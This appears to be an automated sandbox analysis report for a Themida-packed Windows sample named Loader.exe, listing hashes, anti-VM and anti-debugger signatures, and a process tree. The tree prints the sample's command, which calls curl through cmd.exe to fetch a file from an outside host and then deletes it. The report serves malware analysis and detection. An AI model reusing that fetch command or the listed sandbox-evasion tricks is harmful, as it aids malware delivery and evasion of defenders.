Analysis
-
max time kernel
30s -
max time network
32s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
29-03-2023 23:36
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win7-20230220-en
General
-
Target
Loader.exe
-
Size
3.3MB
-
MD5
aa27322c80872d70bcd3eabde5f88141
-
SHA1
daef906c51350e74bc7eeace80e35b1bb2e2f443
-
SHA256
4b08cc716f6f89415e2dc85e3c4eb626fcb9b0697f1596d5a27482b5a40d3227
-
SHA512
12ad87b7ab61c92246ddae74eaa62223be948b57abcea1024b21a63bc0e1e6db66c3d911bbe30c857426602436a2a92479323513f25df9b683cda127a84e594e
-
SSDEEP
49152:F/4780JJXqoYgkt9fT5mhaKG/iKz8Sn/Jypm+IUK7AYoL2ENttSIyUA8z/haouab:cfit/R6Kz8S0IjgvPxyfQ54Yfsxbhc
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
Loader.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Loader.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Loader.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Loader.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Loader.exe -
Processes:
resource yara_rule behavioral2/memory/2172-133-0x00007FF713D60000-0x00007FF714685000-memory.dmp themida behavioral2/memory/2172-134-0x00007FF713D60000-0x00007FF714685000-memory.dmp themida behavioral2/memory/2172-135-0x00007FF713D60000-0x00007FF714685000-memory.dmp themida behavioral2/memory/2172-136-0x00007FF713D60000-0x00007FF714685000-memory.dmp themida behavioral2/memory/2172-139-0x00007FF713D60000-0x00007FF714685000-memory.dmp themida -
Processes:
Loader.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Loader.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Loader.exepid process 2172 Loader.exe -
Suspicious behavior: EnumeratesProcesses 38 IoCs
Processes:
Loader.exepid process 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe 2172 Loader.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
Loader.execmd.exedescription pid process target process PID 2172 wrote to memory of 3248 2172 Loader.exe cmd.exe PID 2172 wrote to memory of 3248 2172 Loader.exe cmd.exe PID 3248 wrote to memory of 2196 3248 cmd.exe curl.exe PID 3248 wrote to memory of 2196 3248 cmd.exe curl.exe PID 2172 wrote to memory of 232 2172 Loader.exe cmd.exe PID 2172 wrote to memory of 232 2172 Loader.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent > OUTPUT.TXT https://auxy.gay/loader/loader.txt2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent https://auxy.gay/loader/loader.txt3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del OUTPUT.TXT >NUL2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\OUTPUT.TXTFilesize
4B
MD584b17206d983a7430710b2a1f8ae52b8
SHA1e350bf129ed3e8455fb310efe23a787adfdf9fb4
SHA256b6403da9b22abe355ad17208a336e658322c5d1d7ff646ca7b9229237ba4aef4
SHA51235101d67d63a9a28f90605bf10b9c8a524eb84bf20ddb8c7e51ef8640d151966f8d22fd18e55119fbcf9da2c3c59fe469a7d12a937440a39e7b997e48d7b4092
-
memory/2172-133-0x00007FF713D60000-0x00007FF714685000-memory.dmpFilesize
9.1MB
-
memory/2172-134-0x00007FF713D60000-0x00007FF714685000-memory.dmpFilesize
9.1MB
-
memory/2172-135-0x00007FF713D60000-0x00007FF714685000-memory.dmpFilesize
9.1MB
-
memory/2172-136-0x00007FF713D60000-0x00007FF714685000-memory.dmpFilesize
9.1MB
-
memory/2172-139-0x00007FF713D60000-0x00007FF714685000-memory.dmpFilesize
9.1MB